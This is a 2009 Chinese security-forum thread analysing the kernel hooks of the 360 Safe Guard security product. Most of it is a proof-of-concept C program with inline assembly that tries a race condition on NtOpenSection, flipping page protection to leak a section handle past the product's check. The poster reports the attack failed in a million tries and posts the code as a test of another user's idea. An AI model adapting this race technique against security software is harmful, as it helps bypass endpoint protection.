-
-
[原创]分析了一下360安全卫士的HOOK(二)——架构与实现
-
发表于: 2009-10-14 21:13
-
|
|
|---|---|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
你的方法太善良了,也许下面这种方法不适合测试的那个函数
 要增加NtOpenSection的运行时间, 只要让程序不停缺页读硬盘就行了 NtOpenSection有个指针参数ObjectAttributes 衍生出另几个指针 OBJECT_ATTRIBUTES OBJECT_ATTRIBUTES->ObjectName OBJECT_ATTRIBUTES->ObjectName->Buffer SecurityDescriptor 这样读上4,5次硬盘,恐怕一个时间片也就差不多了 |
|
|
|
|
|
无BIN无真相,再怎么YY也只是YY而已,实践你就会遇到问题了
这种攻击技术很早以前我就想过了,当时也想当然地认为成功率不会低,实际操作一下才知道是什么结果 为了让楼上信服,我写了个程序来验证楼上的猜想 在我的2GHZ双核机器上(VISTA SP2),100% CPU运行了20分钟,进行了100万次测试,结果是无法达成攻击。 楼主如果对我这个代码的实现(例如uniname 没有page out , 抱歉我不知道怎么在RING3下主动PAGE OUT 内存。。。哈哈,楼上显然想得太简单,你又要多次访问这个地址,又要它PAGE OUT,怎么可能呢,还“硬盘调度几次”。。一次都调度不了。。, 例如干扰线程的处理),或者是对我运行的时间(也许楼上觉得需要运行一个星期或一个月)有什么异议,都可以做出修改,然后自己测试一下~ 以下是代码(因为VISTA上打不开物理内存对象,所以用了一个kernel32.dll的knowndlls section来代替,没什么区别):
UNICODE_STRING uniname = RTL_CONSTANT_STRING(L"\\KnownDlls\\kernel32.dll");
void Feidiaoneicun(PVOID pNeicun)
{
ULONG oldp ;
//备注:尝试了几次修改线程优先级,没什么效果,系统调度还是比较复杂,光靠在RING3瞎猜,还是很难把握。
while(TRUE)
{
//先把内存改为不可写,这样若在写入section handle时,就会失败
VirtualProtect(pNeicun , 0x1000 , PAGE_READONLY , &oldp);
Sleep(0);
//把内存改为可写,这样可过probeforwrite
VirtualProtect(pNeicun , 0x1000 , PAGE_READWRITE , &oldp);
Sleep(0);
}
return ;
}
int main(int argc, char* argv[])
{
HMODULE hmod = LoadLibrary("ntdll.dll");
PVOID pOpen = GetProcAddress(hmod , "NtOpenSection");
PVOID pQuery = GetProcAddress(hmod , "NtQueryObject");
PHANDLE pSecHandle = (PHANDLE)malloc(0x4000);
PVOID pNameBuff = malloc(0x1000);
OBJECT_ATTRIBUTES oba ;
ULONG HandleCount ;
//获取初始化的句柄个数
GetProcessHandleCount(GetCurrentProcess() , &HandleCount);
ULONG times = 0 ;
InitializeObjectAttributes(&oba , &uniname , 0 , 0 ,0 );
ULONG tid ;
//创建干扰线程
HANDLE hThread = CreateThread(0 , 0 , (LPTHREAD_START_ROUTINE)Feidiaoneicun ,pSecHandle, 0 , &tid);
CloseHandle(hThread);
printf("init handle value = %u\n" , HandleCount);
getchar();
while(TRUE)
{
printf("try %u\n" , times);
LONG stat ;
ULONG newhandlecount ;
//调用API
__asm
{
lea eax ,oba
push eax
push 4
push pSecHandle
call pOpen
mov stat , eax
}
//获取新的句柄个数
GetProcessHandleCount(GetCurrentProcess() , &newhandlecount);
HANDLE handlevalue = *pSecHandle ;
printf("stat = %08x SectionHandle = %x HandleCount = %x\n" , stat , handlevalue , newhandlecount);
//如果成功了,那么关闭打开的句柄
if (stat == 0 )
{
//getchar();
CloseHandle(handlevalue);
}
//如果不成功,但是handlecount发生了变化,那么说明有新的句柄产生
//这可能是多线程攻击成功了,也可能是系统触发了一个句柄的增加
//我们检查所有的句柄,看新增的里有没有我们想要的
else if (newhandlecount != HandleCount)
{
ULONG i ;
ULONG retlen ;
ULONG handlequeryed = 0 ;
for (i = 4 ; i < 0xffffffff ; i +=4)
{
__asm
{
lea eax ,retlen
push eax
push 0x1000
push pNameBuff
push 1
push i
call pQuery
mov stat , eax
}
//zwquery object 取名字
if (stat == 0)
{
PUNICODE_STRING pUniName = (PUNICODE_STRING)pNameBuff;
//存在了
if (pUniName->Buffer && wcsnicmp(pUniName->Buffer , uniname.Buffer , uniname.Length / sizeof(WCHAR)) == 0 )
{
printf("get it\n");
getchar();
}
//增加已获得句柄值
handlequeryed ++ ;
}
//如果句柄不是无效(失败的可能还有object 无法query name等)
else if (stat != 0xc0000008)
{
//也增加已获得句柄值
handlequeryed ++ ;
}
//都检查过了,break
if (handlequeryed == newhandlecount)
{
break ;
}
}
//保存新的句柄值了
HandleCount = newhandlecount ;
}
times++;
}
return 0;
}
基本上运行结果,要么是进入API前,到检查开始过程中,内存始终是无效的,或者是进入API前,到完成API后(包括写入SECTION HANDLE),都是有效的~ |
|
|
顺便说一下,晚上看了刑房系列的恐怖星球,非常不错,比同系列的金刚不坏要爽。。推荐一下
|
|
|
|
|
|
|
|
|
|
|
|
|
